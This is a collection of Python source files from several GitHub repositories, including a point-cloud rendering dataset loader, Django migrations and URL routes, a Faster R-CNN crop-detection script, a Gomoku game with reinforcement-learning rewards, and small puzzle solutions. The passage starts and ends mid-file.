self.img_wh[1] / 2], [0, 0, 1]], dtype=torch.float32)\n\n self.id_list = [i for i in range(len(self.meta[\"frames\"]))]\n self.img_list = []\n self.w2c_list = []\n self.ray_list = []\n self.c2w_list = []\n\n for idx in self.id_list:\n frame = self.meta['frames'][idx] \n image_path = os.path.join(datadir, f\"{frame['file_path']}.png\")\n # print(image_path)\n\n # load img\n img = Image.open(image_path)\n img = img.resize(self.img_wh, Image.LANCZOS)\n img = self.transform(img).permute(1,2,0)\n self.img_list.append(img[...,:3] * img[...,-1:] + (1 - img[...,-1:])) \n \n\n # load pose\n pose = np.array(frame['transform_matrix']) @ self.blender2opencv\n pose_gl = pose.copy()\n pose_gl[:,1:3] = (-1) * pose_gl[:,1:3] # for opengl\n self.c2w_list.append(pose_gl)\n c2w = torch.tensor(pose, dtype=torch.float32)\n\n # load ray\n if mode == 'render':\n ray = get_rays(args.H, args.W, self.intrinsic, c2w)\n self.ray_list.append(ray)\n else:\n self.ray_list.append(torch.ones([0]))\n\n pose = np.linalg.inv(pose)\n self.w2c_list.append(torch.tensor(pose, dtype=torch.float32))\n\n # opengl\n self.scene = NNScene()\n xyz, normal, color = load_pc_np(args.pcdir)\n setup_scene(self.scene, xyz, color, normal, c2w.numpy())\n app.Window(visible=False) # creates GL context\n self.renderer = MultiscaleRender(self.scene, [800, 800])\n self.proj_mat = get_proj_matrix(self.intrinsic.numpy(), [800, 800])\n\n def get_pc(self):\n pc_xyz = load_pc(self.pc_dir, self.device) # n,3\n pc = PointCloud(pc_xyz, self.intrinsic, self.device, self.img_wh)\n return pc\n\n def __len__(self):\n return len(self.id_list)\n\n def __getitem__(self, idx):\n \"\"\"\n Returns:\n data dict {\"img.rgb\": rgb (H W C),\n \"img.mask\": mask (H,W 1),\n \"camera_mat\": camera_mat (4,4)\n \"\"\"\n idx = idx % self.__len__()\n rgb = self.img_list[idx]\n w2c = self.w2c_list[idx]\n ray = self.ray_list[idx]\n c2w = self.c2w_list[idx]\n # ray = get_rays(800, 800, self.intrinsic, torch.tensor(c2w))\n t1 = time.time()\n depth = self.renderer.render(view_matrix=c2w, proj_matrix=self.proj_mat) # np 800 800 1\n t2 = time.time()\n depth[depth==0] = -1\n \n\n return {\"idx\": str(idx).rjust(3,'0'),\n \"rgb\": rgb.to(self.device), \n \"w2c\": w2c.to(self.device),\n \"ray\": ray.to(self.device),\n \"zbuf\": torch.tensor(depth, device=self.device),\n 't':t2-t1}\n","repo_name":"yizhangphd/FreqPCR","sub_path":"dataset_gl/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":3894,"program_lang":"python","lang":"en","doc_type":"code","stars":48,"dataset":"github-code","pt":"37"} +{"seq_id":"885554359","text":"#!/usr/bin/env python3\nimport sys\n\nMOD = 123 # type: int\nYES = \"yes\" # type: str\nNO = \"NO\" # type: str\n\n\ndef solve(N: int, M: int, H: \"List[List[str]]\", A: \"List[int]\", B: \"List[float]\", Q: int, X: \"List[int]\"):\n print(N, M)\n assert len(H) == N - 1\n for i in range(N - 1):\n assert len(H[i]) == M - 2\n print(*H[i])\n assert len(A) == N - 1\n assert len(B) == N - 1\n for i in range(N - 1):\n print(A[i], B[i])\n print(Q)\n assert len(X) == M + Q\n for i in range(M + Q):\n print(X[i])\n\n print(YES)\n print(NO)\n print(MOD)\n\n\ndef main():\n def iterate_tokens():\n for line in sys.stdin:\n for word in line.split():\n yield word\n tokens = iterate_tokens()\n N = int(next(tokens)) # type: int\n M = int(next(tokens)) # type: int\n H = [[next(tokens) for _ in range(M - 1 - 2 + 1)] for _ in range(N - 2 + 1)] # type: \"List[List[str]]\"\n A = [int()] * (N - 2 + 1) # type: \"List[int]\"\n B = [float()] * (N - 2 + 1) # type: \"List[float]\"\n for i in range(N - 2 + 1):\n A[i] = int(next(tokens))\n B[i] = float(next(tokens))\n Q = int(next(tokens)) # type: int\n X = [int(next(tokens)) for _ in range(M + Q)] # type: \"List[int]\"\n solve(N, M, H, A, B, Q, X)\n\nif __name__ == '__main__':\n main()\n","repo_name":"kyuridenamida/atcoder-tools","sub_path":"tests/resources/test_codegen/test_default_code_generators_and_templates/python/expected_echo_generated_code.py","file_name":"expected_echo_generated_code.py","file_ext":"py","file_size_in_byte":1316,"program_lang":"python","lang":"en","doc_type":"code","stars":367,"dataset":"github-code","pt":"37"} +{"seq_id":"6264618235","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('partner', '0002_auto_20141007_2032'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='partner',\n name='users',\n field=models.ManyToManyField(related_name='partners', verbose_name='Users', to=settings.AUTH_USER_MODEL, blank=True),\n ),\n ]\n","repo_name":"django-oscar/django-oscar","sub_path":"tests/_site/apps/partner/migrations/0003_auto_20150604_1450.py","file_name":"0003_auto_20150604_1450.py","file_ext":"py","file_size_in_byte":514,"program_lang":"python","lang":"en","doc_type":"code","stars":5941,"dataset":"github-code","pt":"37"} +{"seq_id":"45842302938","text":"#!/usr/bin/env python\n### https://blog.csdn.net/weixin_42111393/article/details/82940681\n## 将tf-faster-r cnn中的框画在一张图内\n# --------------------------------------------------------\n# Tensorflow Faster R-CNN\n# Licensed under The MIT License [see LICENSE for details]\n# Written by Xinlei Chen, based on code from Ross Girshick\n# --------------------------------------------------------\n\n\"\"\"\nDemo script showing detections in sample images.\n\nSee README.md for installation instructions before running.\n\"\"\"\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport argparse\nimport os\nimport warnings\nwarnings.filterwarnings('ignore')\n\n\nimport cv2\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport tensorflow as tf\nimport os.path as osp\nimport os\n\nfrom Crop_Detection.lib.config import config as cfg\nfrom Crop_Detection.lib.utils.nms_wrapper import nms\nfrom Crop_Detection.lib.utils.test import im_detect\n#from nets.resnet_v1 import resnetv1\nfrom Crop_Detection.lib.nets.vgg16 import vgg16\nfrom Crop_Detection.lib.utils.timer import Timer\n\nimport Picture_Slicing_Processing as PSP\nimport draw_toolbox as draw_toolbox\nimport dataset_common as dataset_common\n\n# CLASSES = ('__background__',\n# 'aeroplane', 'bicycle', 'bird', 'boat',\n# 'bottle', 'bus', 'car', 'cat', 'chair',\n# 'cow', 'diningtable', 'dog', 'horse',\n# 'motorbike', 'person', 'pottedplant',\n# 'sheep', 'sofa', 'train', 'tvmonitor')\nCLASSES = ('__background__','bleeding_black','bleeding_leaf','bleeding_leaf_big','bleeding_flower')\n\nNETS = {'vgg16': ('vgg16_faster_rcnn_iter_68500.ckpt',), 'res101': ('res101_faster_rcnn_iter_110000.ckpt',)}\nDATASETS = {'pascal_voc': ('default',), 'pascal_voc_0712': ('voc_2007_trainval+voc_2012_trainval',)}\n\n\ndef get_bbox( class_name, im, dets, thresh=0.5):\n # cls_bbox_score = {}\n all_bbox = []\n inds = np.where(dets[:, -1] >= thresh)[0]\n if len(inds) == 0:\n return all_bbox\n else:\n print('Box numbers: ', class_name, ' ', len(inds))\n h, w, _ = im.shape\n for i in inds:\n bbox = dets[i, :4]\n score = dets[i, -1]\n # temp_bbox_yx = []\n # temp_bbox_yx.append(bbox[1]/h) # y1\n # temp_bbox_yx.append(bbox[0] / w) # x1\n # temp_bbox_yx.append(bbox[3] / h) # y2\n # temp_bbox_yx.append(bbox[2] / w) # x2\n # temp_bbox_yx.append(score) # 得分\n # all_bbox.append(temp_bbox_yx)\n all_bbox.append(dets[i])\n # if len(all_bbox) != 0:\n # cls_bbox_score[class_name] = all_bbox\n return all_bbox\n\n\ndef vis_detections(ax, im, class_name, dets, thresh=0.5):\n \"\"\"Draw detected bounding boxes.\"\"\"\n inds = np.where(dets[:, -1] >= thresh)[0]\n if len(inds) == 0:\n return\n\n print('Box numbers: ', class_name, ' ',len(inds))\n for i in inds:\n bbox = dets[i, :4]\n score = dets[i, -1]\n #print(bbox[0], bbox[1], bbox[2], bbox[3])\n ## 红框\n ax.add_patch(\n plt.Rectangle((bbox[0], bbox[1]),\n bbox[2] - bbox[0],\n bbox[3] - bbox[1], fill=False,\n edgecolor='red', linewidth=1)## linewidth=3.5\n )\n ## 白字蓝底标签\n ax.text(bbox[0], bbox[1] - 2,\n '{:s} {:.3f}'.format(class_name, score),\n bbox=dict(facecolor='blue', alpha=0),\n fontsize=3, color='white')## fontsize=14; alpha=0.5\n\n ## 标题\n # ax.set_title(('{} detections with '\n # 'p({} | box) >= {:.1f}').format(class_name, class_name,\n # thresh),\n # fontsize=14)\n\n #plt.tight_layout() ### tight_layout会自动调整子图参数,使之填充整个图像区域\n\n\ndef demo(sess, net, image_name):\n \"\"\"Detect object classes in an image using pre-computed object proposals.\"\"\"\n\n # Load the demo image\n #im_file = os.path.join(cfg.FLAGS2[\"data_dir\"], 'demo', image_name)\n im_file = os.path.join(file_path, image_name)\n im = cv2.imread(im_file)\n\n # Detect all object classes and regress object bounds\n timer = Timer()\n timer.tic()\n scores, boxes = im_detect(sess, net, im)\n timer.toc()\n #print('Detection took {:.3f}s for {:d} object proposals'.format(timer.total_time, boxes.shape[0]))\n # {:d}个对象检测耗时{:.3f}秒\n\n # Visualize detections for each class\n # 可视化每个类的检测\n CONF_THRESH = 0.85 # 置信度,可视化置信度大于0.6的框\n NMS_THRESH = 0.1 # 示非极大值抑制,这个值越小表示要求的红框重叠度越小,0.0表示不允许重叠\n im = im[:, :, (2, 1, 0)] # 1,2,0��色;0,1,2蓝色\n fig, ax = plt.subplots(figsize=(12, 12)) # figsize代表像素值\n ax.imshow(im, aspect='equal')\n\n label_total = []\n score_totatl = []\n bbox_total = []\n for cls_ind, cls in enumerate(CLASSES[1:]):\n cls_ind += 1 # because we skipped background\n cls_boxes = boxes[:, 4 * cls_ind:4 * (cls_ind + 1)]\n cls_scores = scores[:, cls_ind]\n dets = np.hstack((cls_boxes,\n cls_scores[:, np.newaxis])).astype(np.float32)\n keep = nms(dets, NMS_THRESH)\n dets = dets[keep, :]\n bbox_score = get_bbox(cls_ind, dets, thresh=CONF_THRESH) # 每一类的bbox\n if len(bbox_score) != 0:\n cls_id_num = len(bbox_score)\n for i in range(cls_id_num):\n label_total.append(cls_ind)\n score_totatl.append(bbox_score[i][-1])\n bbox_total.append(bbox_score[i][:-4])\n\n vis_detections(ax, im, cls, dets, thresh=CONF_THRESH)\n plt.axis('off') ## #不显示坐标尺寸\n plt.draw()\n\n ##去白边\n height, width, channels = im.shape\n # 如果dpi=300,那么图像大小=height*width\n fig.set_size_inches(width / 100.0 / 3.0, height / 100.0 / 3.0)\n plt.gca().xaxis.set_major_locator(plt.NullLocator())\n plt.gca().yaxis.set_major_locator(plt.NullLocator())\n plt.subplots_adjust(top=1, bottom=0, left=0, right=1, hspace=0, wspace=0)\n plt.margins(0, 0)\n # dpi是设置清晰度的,大于300就很清晰了,但是保存下来的图片很大\n # print('dddd')\n return label_total, score_totatl, bbox_score\n\n\ndef mulite_demo(sess, net, im, NMS_thred=None):\n \"\"\"Detect object classes in an image using pre-computed object proposals.\"\"\"\n\n # Load the demo image\n # Detect all object classes and regress object bounds\n timer = Timer()\n timer.tic()\n scores, boxes = im_detect(sess, net, im)\n timer.toc()\n #print('Detection took {:.3f}s for {:d} object proposals'.format(timer.total_time, boxes.shape[0]))\n # {:d}个对象检测耗时{:.3f}秒\n\n # Visualize detections for each class\n # 可视化每个类的检测\n CONF_THRESH = NMS_thred # 置信度,可视化置信度大于0.6的框\n NMS_THRESH = 0.3 # 示非极大值抑制,这个值越小表示要求的红框重叠度越小,0.0表示不允许重叠\n label_total = []\n score_total = []\n bbox_total = []\n for cls_ind, cls in enumerate(CLASSES[1:]):\n cls_ind += 1 # because we skipped background\n cls_boxes = boxes[:, 4 * cls_ind:4 * (cls_ind + 1)]\n cls_scores = scores[:, cls_ind]\n dets = np.hstack((cls_boxes,\n cls_scores[:, np.newaxis])).astype(np.float32)\n keep = nms(dets, NMS_THRESH)\n dets = dets[keep, :]\n bbox_score = get_bbox(cls_ind, im, dets, thresh=CONF_THRESH) # 每一类的bbox\n if len(bbox_score) != 0:\n cls_id_num = len(bbox_score)\n for i in range(cls_id_num):\n label_total.append(cls_ind)\n score_total.append(bbox_score[i][-1])\n bbox_total.append(bbox_score[i][:4])\n\n # print(len(label_total), len(score_total), len(bbox_total))\n label_total = np.array(label_total)\n score_total = np.array(score_total)\n bbox_total = np.array(bbox_total)\n return label_total, score_total, bbox_total\n\n\ndef parse_args():\n \"\"\"Parse input arguments.\"\"\"\n parser = argparse.ArgumentParser(description='Tensorflow Faster R-CNN demo')\n parser.add_argument('--net', dest='demo_net', help='Network to use [vgg16 res101]',\n choices=NETS.keys(), default='vgg16')\n parser.add_argument('--dataset', dest='dataset', help='Trained dataset [pascal_voc pascal_voc_0712]',\n choices=DATASETS.keys(), default='pascal_voc')\n args = parser.parse_args()\n\n return args\n\n\ndef call_Detection(input, thred=0.5):\n print(thred)\n if thred is None:\n thred = 0.5\n image_path = input\n NMS_thred = thred\n\n basename = 'Detection_result_Thred_' + str(thred) + '_' + osp.basename(image_path)\n dirname = osp.dirname(image_path)\n\n if not osp.exists(dirname):\n os.mkdir(dirname)\n\n savedir = osp.join(dirname, 'out_result/')\n if not osp.exists(savedir):\n os.mkdir(savedir)\n\n savename = osp.join(savedir, basename)\n\n args = parse_args()\n # model path\n demonet = args.demo_net\n dataset = args.dataset\n\n tfmodel = os.path.join('./Crop_Detection/trained_models', 'default_0.0001_DataAug2', NETS[demonet][0])\n\n if not os.path.isfile(tfmodel + '.meta'):\n print('tfmodel: ', tfmodel)\n raise IOError(('{:s} not found.\\nDid you download the proper networks from '\n 'our server and place them properly?').format(tfmodel + '.meta'))\n\n # set config\n tfconfig = tf.ConfigProto(allow_soft_placement=True)\n tfconfig.gpu_options.allow_growth = True\n tfconfig.gpu_options.per_process_gpu_memory_fraction = 0.6\n\n # init session\n sess = tf.Session(config=tfconfig)\n # load network\n if demonet == 'vgg16':\n net = vgg16(batch_size=1)\n\n else:\n raise NotImplementedError\n\n n_classes = len(CLASSES)\n # create the structure of the net having a certain shape (which depends on the number of classes)\n net.create_architecture(sess, \"TEST\", n_classes,\n tag='default', anchor_scales=[8, 16, 32])\n saver = tf.train.Saver()\n saver.restore(sess, tfmodel)\n\n print('Loaded network {:s}'.format(tfmodel))\n paths = []\n paths.append(image_path)\n for im_name in paths: # 大图\n print('---------------------------------------------------------')\n print('Demo for data/demo/{}'.format(im_name))\n labels_total = []\n scores_total = []\n bboxes_total = []\n\n import time\n start_time = time.time()\n sub_img, site = PSP.splitimage(image_path, shape=[416, 416], strided=300)\n\n for image in sub_img: # 子图\n\n labels_, scores_, bboxes_ = mulite_demo(sess, net, image, NMS_thred=NMS_thred) # 单张子图结果\n num_bbox = len(labels_)\n labels_total.append(labels_)\n scores_total.append(scores_)\n bboxes_total.append(bboxes_)\n\n print('num of bbo:', len(bboxes_total))\n\n labels_merge, scores_merge, bboxes_merge = PSP.merge_label(labels_total, scores_total, bboxes_total, site,\n [500, 500], im.shape)\n\n result_img, shapes = draw_toolbox.bboxes_draw_on_img(im, labels_merge, scores_merge, bboxes_merge)\n\n label_id_dict = draw_toolbox.gain_translate_table()\n # labels_merge = labels_merge.tolist()\n result_num = {}\n for i in range(len(labels_merge)):\n temp = labels_merge[i]\n if temp not in result_num.keys():\n result_num[temp] = 1\n else:\n result_num[temp] = result_num[temp] + 1\n class_num = ''\n for key, value in result_num.items():\n if key in label_id_dict.keys():\n class_num = class_num + label_id_dict[key] + \"_\" + str(value)\n end_time = time.time()\n\n time_image = end_time - start_time\n jsonname = 'Thred_' + str(thred) +osp.basename(image_path).split('.')[0] + '.json'\n filename = osp.join(savedir, jsonname)\n\n from save_json import Save_Json\n json_result = Save_Json()\n json_result.save(filename, shapes, im, NMS_thred)\n cv2.imwrite(savename, result_img)\n\n print('--------------- finish -----------------------')\n\n\n# if __name__ == '__main__':\n# img = '/home/kfgeo/Models/Crop_Detection/orig_img/test.png'\n# call_Detection(img,thred=0.8)\n# # args = parse_args()\n# # out_path = '/home/kfgeo/Models/Crop_Detection/123/'\n# # # model path\n# # demonet = args.demo_net\n# # dataset = args.dataset\n# # # tfmodel = os.path.join('output', demonet, DATASETS[dataset][0], 'default', NETS[demonet][0])\n# # tfmodel = os.path.join('trained_models','default_0.0001_DataAug2', NETS[demonet][0])\n# #\n# # if not os.path.isfile(tfmodel + '.meta'):\n# # print('tfmodel: ',tfmodel)\n# # raise IOError(('{:s} not found.\\nDid you download the proper networks from '\n# # 'our server and place them properly?').format(tfmodel + '.meta'))\n# #\n# # # set config\n# # tfconfig = tf.ConfigProto(allow_soft_placement=True)\n# # tfconfig.gpu_options.allow_growth = True\n# #\n# # # init session\n# # sess = tf.Session(config=tfconfig)\n# # # load network\n# # if demonet == 'vgg16':\n# # net = vgg16(batch_size=1)\n# # # elif demonet == 'res101':\n# # # net = resnetv1(batch_size=1, num_layers=101)\n# # else:\n# # raise NotImplementedError\n# #\n# # n_classes = len(CLASSES)\n# # # create the structure of the net having a certain shape (which depends on the number of classes)\n# # net.create_architecture(sess, \"TEST\", n_classes,\n# # tag='default', anchor_scales=[8, 16, 32])\n# # saver = tf.train.Saver()\n# # saver.restore(sess, tfmodel)\n# #\n# # print('Loaded network {:s}'.format(tfmodel))\n# #\n# # # im_names = ['000456.jpg', '000457.jpg', '000542.jpg', '001150.jpg',\n# # # '001763.jpg', '004545.jpg']\n# # # file_path = '/kuafugeo/zmy/Faster-RCNN-TensorFlow-Python3/data/test'\n# # file_path ='/home/kfgeo/Models/Crop_Detection/orig_img/'\n# # im_names = os.listdir(file_path)\n# #\n# # for im_name in im_names: # 大图\n# # print('---------------------------------------------------------')\n# # print('Demo for data/demo/{}'.format(im_name))\n# # # print('\\n')\n# # labels_total = []\n# # scores_total = []\n# # bboxes_total = []\n# # im_file = os.path.join(file_path, im_name)\n# # # im_name = 'DJI_0017.JPG'\n# # # im_file = '/kuafugeo/zmy/Faster-RCNN-TensorFlow-Python3/data/demo_big/DJI_0017.JPG'\n# # import time\n# # start_time = time.time()\n# # im = cv2.imread(im_file)\n# # # labels_list, score_list, bbox_list = demo(sess, net, im_name)\n# # sub_img, site = PSP.splitimage(im, shape=[500, 500], strided=200)\n# # #i=0\n# # for image in sub_img: # 子图\n# # # cv2.imwrite('/kuafugeo/zmy/Faster-RCNN-TensorFlow-Python3/data/17/'+str(i)+'.png',image)\n# # # i+=1\n# # labels_, scores_, bboxes_ = mulite_demo(sess, net, image) # 单张子图结果\n# # # print('labels_:', labels_)\n# # # print('scores_: ', scores_)\n# # # print('bboxes_: ', bboxes_)\n# # num_bbox = len(labels_)\n# # #print('label: ',labels_, 'scores_: ',scores_, 'bboxes_: ',bboxes_)\n# # #print('len(labels_): ',len(labels_), 'len(scores_): ',len(scores_), 'len(bboxes_): ',len(bboxes_))\n# # # print('num_bbox: ',num_bbox)\n# # #if num_bbox != 0:\n# # labels_total.append(labels_)\n# # scores_total.append(scores_)\n# # bboxes_total.append(bboxes_)\n# # # for i in range(num_bbox):\n# # # labels_total.append(labels_[i])\n# # # scores_total.append(scores_[i])\n# # # bboxes_total.append(bboxes_[i])\n# # print('num of bbo:',len(bboxes_total))\n# # # # labels_ =\n# # labels_merge, scores_merge, bboxes_merge = PSP.merge_label(labels_total, scores_total, bboxes_total, site, [500, 500],im.shape)\n# # # print('labels_merge: ',labels_merge)\n# # # print('len(labels_merge): ',len(labels_merge))\n# # # num = 0\n# # # for t in range(len(bboxes_total)):\n# # # num = num + len(bboxes_total[t])\n# # # temp_bbox_total = np.zeros(shape=(num, 4))\n# # #\n# # # num = 0\n# # # for t in range(len(bboxes_total)):\n# # # for j in range(len(bboxes_total[t])):\n# # # temp_bbox_total[num] = bboxes_total[t][j]\n# # # num = num + 1\n# # #\n# # # labels_merge, scores_merge = [], []\n# # # for t in range(len(labels_total)):\n# # # for j in range(len(labels_total[t])):\n# # # labels_merge.append(labels_total[t][j])\n# # #\n# # # for t in range(len(scores_total)):\n# # # for j in range(len(scores_total[t])):\n# # # scores_merge.append(scores_total[t][j])\n# # #\n# # # bboxes_merge = temp_bbox_total\n# # # labels_merge = np.array(labels_merge)\n# # # scores_merge = np.array(scores_merge)\n# # # im = cv2.imread('/kuafugeo/zmy/Faster-RCNN-TensorFlow-Python3/data/0.png')\n# # result_img = draw_toolbox.bboxes_draw_on_img(im, labels_merge, scores_merge, bboxes_merge)\n# #\n# # label_id_dict = draw_toolbox.gain_translate_table()\n# # # labels_merge = labels_merge.tolist()\n# # result_num = {}\n# # for i in range(len(labels_merge)):\n# # temp = labels_merge[i]\n# # if temp not in result_num.keys():\n# # result_num[temp] = 1\n# # else:\n# # result_num[temp] = result_num[temp] + 1\n# # class_num = ''\n# # for key, value in result_num.items():\n# # if key in label_id_dict.keys():\n# # class_num = class_num + label_id_dict[key] + \"_\" + str(value)\n# # end_time = time.time()\n# #\n# # time_image = end_time - start_time\n# #\n# # cv2.imwrite(out_path + im_name[:-4] + '_' + class_num + '_totalnums_' + str(len(labels_merge))\n# # + '_' + '%.2f' % time_image+ '.png', result_img)\n# # #print(PSP)\n# # # #portion = os.path.splitext(im_name)\n# # # new_file_path = '/kuafugeo/zmy/Faster-RCNN-TensorFlow-Python3/data/new_image/'\n# # # plt.savefig(new_file_path + im_name, dpi=300)\n# #\n# # print('---------------------------------------------------------')\n# #\n# #\n# # #plt.show()","repo_name":"ResidualNS/tobacco_planting_project","sub_path":"second-stage/pytorch-yolov3-master/model_test.py","file_name":"model_test.py","file_ext":"py","file_size_in_byte":19084,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"9716619918","text":"import numpy as np\n\nif __name__ == \"__main__\":\n\timport tensorflow as tf\n\tfrom .ROIPoolingWrapper import *\n\n\twith tf.Session() as sess:\n\t\timg = np.zeros((1,8,8, 9), np.float32)\n\t\tboxes = tf.constant([[0,0,2*16,5*16]], dtype=tf.float32)\n\t\tprint(boxes.get_shape().as_list())\n\n\t\tyOffset=0\n\t\txOffset=0\n\t\tchOffset=0\n\t\timg[0,yOffset+0:yOffset+1,xOffset+0:xOffset+1,chOffset+0:chOffset+1]=1;\n\t\t#img[:,:,:,:]=1\n\t\tp = tf.placeholder(tf.float32, shape=img.shape)\n\n\t\tnp.set_printoptions(threshold=5000, linewidth=150)\n\n\t\tpooled=positionSensitiveRoiPooling(p, boxes)\n\t\tpooled=tf.Print(pooled,[tf.shape(pooled)],\"pooled shape\", summarize=100)\n\t\tprint(sess.run(pooled, feed_dict={p: img}))\n\n\n\t\tloss = tf.reduce_sum(pooled)\n\n\t\tg = tf.gradients(loss, p)\n\n\t\tprint(img)\n\t\tprint(sess.run(g, feed_dict={p: img})[0])\n\t\tprint(sess.run(g, feed_dict={p: img})[0][:,:,:,1])\n\n\n","repo_name":"wucng/TensorExpand","sub_path":"TensorExpand/Object detection/RFCN/RFCN-tensorflow/BoxEngine/ROIPooling/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":850,"program_lang":"python","lang":"en","doc_type":"code","stars":348,"dataset":"github-code","pt":"37"} +{"seq_id":"5283994877","text":"from django.urls import path\nfrom rest_framework.urlpatterns import format_suffix_patterns\n\nfrom . import views\n\napp_name = 'drivers_app'\n\nurlpatterns = [\n # path('', views.index, name='index'),\n # path('drivers/', views.drivers_list),\n # path('drivers//', views.drivers_detail),\n # path('schedule/', views.schedule_list),\n # path('schedule//', views.schedule_detail),\n path('drivers/', views.DriversList.as_view()),\n path('drivers//', views.DriversDetail.as_view()),\n path('schedule/', views.ScheduleList.as_view()),\n path('schedule//', views.ScheduleDetail.as_view()),\n]\n\nurlpatterns = format_suffix_patterns(urlpatterns)\n","repo_name":"hagarz/JV-Nehagim","sub_path":"ey_drivers/drivers_app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":683,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"21230454667","text":"'''This script uses pytesseract to read the data from the whatsapp call log screenshots'''\nimport image_processing\nimport glob\nfrom tqdm import tqdm\n\n\ncall_directory = r'C:\\Users\\Owner\\Documents\\Programming\\Python\\Projects\\Kayes Gift\\Whatsapp_Analyzer\\Call_Screenshots'\ncall_screenshot_list = glob.glob(call_directory + \"/*.png\")\ncall_log = {}\nfor call in tqdm(call_screenshot_list):\n file_name,call_data = image_processing.process_image(call)\n call_log[file_name] = call_data\ncall_log_txt = call_directory + r\"\\call_logv2.txt\"\noutfile = open(call_log_txt, \"w\")\nprint(call_log, file=outfile)\noutfile.close()","repo_name":"Markpajr/Whatsapp_Analyzer","sub_path":"OCR_Call_Screenshot.py","file_name":"OCR_Call_Screenshot.py","file_ext":"py","file_size_in_byte":613,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"4337448346","text":"# -*- coding: utf-8 -*-\n# @Author: aaronlai\n# @Date: 2016-10-07 15:03:47\n# @Last Modified by: AaronLai\n# @Last Modified time: 2016-10-07 17:30:26\n\nimport numpy as np\n\n\ndef initGame(width=19):\n \"\"\"Initialize width x width new game\"\"\"\n state = np.zeros((width, width, 2))\n available = np.zeros((width, width))\n\n return state, available\n\n\ndef makeMove(state, available, action, actor):\n \"\"\"specify the actor and the location of the new stone\"\"\"\n available_ret = np.zeros(available.shape)\n available_ret[:] = available[:]\n\n if available_ret[action] == 0:\n state[action][actor] = 1\n available_ret[action] = float(\"-inf\")\n return state, available_ret\n else:\n return None, available_ret\n\n\ndef winGame(sub_state):\n \"\"\"check if the game winning criteria is met\"\"\"\n for i in range(sub_state.shape[0] - 4):\n for j in range(sub_state.shape[1] - 4):\n\n horizontal = sub_state[i][j: j+5]\n if (horizontal == 1).all():\n return True\n\n vertical = [sub_state[i+k, j] for k in range(5)]\n if (np.array(vertical) == 1).all():\n return True\n\n diagonal = [sub_state[(i+k, j+k)] for k in range(5)]\n if (np.array(diagonal) == 1).all():\n return True\n\n return False\n\n\ndef fullGrid(state):\n \"\"\"check if the chessboard is full\"\"\"\n return not ((state[:, :, 0] + state[:, :, 1]) == 0).any()\n\n\ndef getReward(state, whose_turn, win_reward=500, lose_reward=-1000,\n even_reward=-100, keepgoing_reward=-10):\n \"\"\"calculate the reward given to whom just moved\"\"\"\n reward = [0, 0]\n\n if winGame(state[:, :, whose_turn]):\n reward[whose_turn] = win_reward\n reward[1 - whose_turn] = lose_reward\n\n elif fullGrid(state):\n reward = [even_reward, even_reward]\n\n else:\n reward[whose_turn] = keepgoing_reward\n\n return reward\n\n\ndef drawGrid(state):\n \"\"\"visualize the chessboard\"\"\"\n grid = np.zeros(state.shape[:2], dtype=' 0).any():\n\n if (state[(i, j)] == 1).all():\n raise\n\n elif state[(i, j)][0] == 1:\n grid[(i, j)] = 'O'\n\n else:\n grid[(i, j)] = 'X'\n\n return grid\n\n\ndef displayGrid(grid):\n \"\"\"print out the chessboard\"\"\"\n wid = grid.shape[0]\n show_num = 9 if wid > 9 else wid\n\n # chessboard\n line = '\\n' + '- + ' * (wid - 1) + '- {}\\n'\n line = line.join([' | '.join(grid[i]) for i in range(wid)])\n\n # mark the number of its lines\n bottom = ('\\n' + ' {} ' * show_num)\n bottom = bottom.format(*[i+1 for i in range(show_num)])\n\n if show_num == 9:\n part = (' {} '*(wid - show_num))\n part = part.format(*[i+1 for i in range(show_num, wid)])\n bottom += part\n\n print(line.format(*[i+1 for i in range(wid)]) + bottom)\n\n\ndef try_display(width=19):\n state, avai = initGame(width)\n terminate = False\n\n print('Start')\n for i in range(int(width**2 / 2)):\n\n for actor in [0, 1]:\n new_state = None\n\n while new_state is None:\n x = np.random.randint(width)\n y = np.random.randint(width)\n move = (x, y)\n new_state, avai = makeMove(state, avai, move, actor)\n\n state = new_state\n reward = getReward(state, actor)\n\n if 500 in reward:\n print('\\tterminal: %d\\n' % i)\n terminate = True\n break\n\n elif -100 in reward:\n print('\\tchessboard is full.\\n')\n terminate = True\n break\n\n if terminate:\n break\n\n displayGrid(drawGrid(state))\n\n\ndef main():\n try_display(11)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"AaronYALai/Reinforcement_Learning_Project","sub_path":"gomoku_game.py","file_name":"gomoku_game.py","file_ext":"py","file_size_in_byte":3933,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"37"} +{"seq_id":"31976991309","text":"\n#infile = \"rosalind_sample.txt\"\ninfile = \"rosalind_ins.txt\"\n\nwith open(infile) as f:\n array = f.readlines()[1].split()\n total_swap = 0\n for i in range(2, len(array) + 1):\n last_item = int(array[0:i][-1])\n total_swap += sum(int(elem) > last_item for elem in array[0:i])\n\n print(total_swap)\n","repo_name":"dpflieger/Rosalind","sub_path":"Algorithmics_heights/04_INS/INS.py","file_name":"INS.py","file_ext":"py","file_size_in_byte":316,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"8401860902","text":"def main():\n\n numCases = int(input())\n for num in range(numCases):\n # This is a meaning less line but for Kattis input....\n numShops = input()\n\n shopLocations = [int(x) for x in input().split(' ')]\n\n # Sort from the closest to the furthest\n sortedLocations = sorted(shopLocations)\n\n # Add up distances between all shops\n walkDistance = 0\n for i in range(len(sortedLocations)-1):\n walkDistance += sortedLocations[i+1]-sortedLocations[i]\n\n # Add furthes shor to car distance\n walkDistance += sortedLocations[-1] - sortedLocations[0]\n\n print(walkDistance)\n\n\nif __name__ == \"__main__\":\n 